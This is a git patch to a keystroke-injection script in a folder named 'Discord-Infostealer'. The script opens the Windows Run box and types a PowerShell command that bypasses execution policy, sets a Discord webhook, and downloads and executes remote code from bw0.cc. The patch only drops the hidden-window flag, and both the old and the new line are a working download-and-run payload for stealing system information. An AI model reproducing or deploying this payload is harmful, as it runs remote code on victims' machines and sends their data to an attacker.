From e0d0c82313d34163a9b28cfb73f14aeaa521d829 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:53:08 +0000 Subject: [PATCH] Update System-Info-to-Discord.txt --- Discord-Infostealer/System-Info-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Discord-Infostealer/System-Info-to-Discord.txt b/Discord-Infostealer/System-Info-to-Discord.txt index f5b65bc..8750147 100644 --- a/Discord-Infostealer/System-Info-to-Discord.txt +++ b/Discord-Infostealer/System-Info-to-Discord.txt @@ -14,6 +14,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info) +STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info) ENTER